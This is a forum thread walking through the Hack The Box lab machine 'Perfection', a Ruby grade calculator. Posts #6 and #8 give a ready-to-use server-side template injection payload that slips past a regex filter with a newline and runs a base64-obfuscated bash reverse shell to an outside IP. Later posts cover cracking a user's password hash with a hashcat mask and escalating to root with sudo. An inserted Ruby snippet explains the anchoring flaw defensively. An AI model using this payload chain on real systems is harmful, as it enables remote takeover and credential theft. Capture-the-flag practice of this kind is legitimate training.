HTB - Perfection
by Art10n - Saturday March 2, 2024 at 05:17 PM
#1
Perfection
Linux · Easy
https://app.hackthebox.com/machines/590
#2
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80e479e85928df952dad574a4604ea70 (ECDSA)
|_ 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Server: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)

https://www.exploit-db.com/exploits/5215
#3
Those are old shit, attack the calculator.
#4
Fuzzed all special characters & URL encoding... all banned besides URL-encoded numbers.
Maybe look into Sinatra?
#5
The only thing I noticed is that the calculator first adds up all the numbers, and only when they add up to 100 does it check the input (and return the dreaded 'Malicious input detected').
#6
You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. Here is a payload:

category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+

Then you have to find susan's password hash in the /home/susan/Migration/pupilpath_credentials.db file:
strings /home/susan/Migration/pupilpath_credentials.db

The format of the password is in /var/spool/mail/susan. You can crack it with hashcat in mask mode:
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
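An added example (not code from the box or from any poster in this thread) of why a newline defeats the kind of regex filter described in post #6 and quoted in #8: in Ruby, ^ and $ match at every line boundary, so a value whose first line looks clean passes a /^[a-z]+$/ allowlist, while a check anchored with \A and \z rejects the whole string. The allowlist regex and the category field are assumptions; the box's real filter is not shown in this thread.

```ruby
require 'cgi'

# Hypothetical allowlist for the category field (assumption: the real filter
# on the box is not shown in the thread). Both are meant to allow only
# lowercase letters, but they behave differently on multi-line input.
WEAK_CATEGORY_RE   = /^[a-z]+$/     # ^ and $ match at every line boundary in Ruby
STRICT_CATEGORY_RE = /\A[a-z]+\z/   # \A and \z match only at string start and end

# What the server sees after URL-decoding a form value such as category1=a%0A...
def decoded_category(raw_form_value)
  CGI.unescape(raw_form_value)
end

# Weak check: true whenever SOME line of the value is all lowercase letters.
def weak_check(value)
  !!(value =~ WEAK_CATEGORY_RE)
end

# Strict check: true only when the WHOLE value is lowercase letters.
def strict_check(value)
  !!(value =~ STRICT_CATEGORY_RE)
end

if __FILE__ == $0
  # Constructed sample: a valid-looking first line, then %0A and more text.
  value = decoded_category("a%0Anot+allowed")   # => "a\nnot allowed"
  puts "weak check accepts:   #{weak_check(value)}"   # true  - only "a" was examined
  puts "strict check accepts: #{strict_check(value)}" # false - the newline is part of the string
end
```

The same mismatch applies to any Ruby validation written with ^/$ on untrusted input; anchoring with \A/\z (not \Z, which still tolerates a trailing newline) is the fix.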
#7
Thanks for the payload. I am trying this by changing the IP and port but am still unable to get a reverse shell. Any idea what I could be doing wrong?
#8
(Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. Here is a payload:

category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+

Then you have to find susan's password hash in the /home/susan/Migration/pupilpath_credentials.db file:
strings /home/susan/Migration/pupilpath_credentials.db

The format of the password is in /var/spool/mail/susan. You can crack it with hashcat in mask mode:
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

How did you find that password pattern? Guessed it?
#9
Check the mail in /var/mail/susan for the password pattern.
#10
For root:

$ su - su
$ sudo su
$ cat /root/root.txt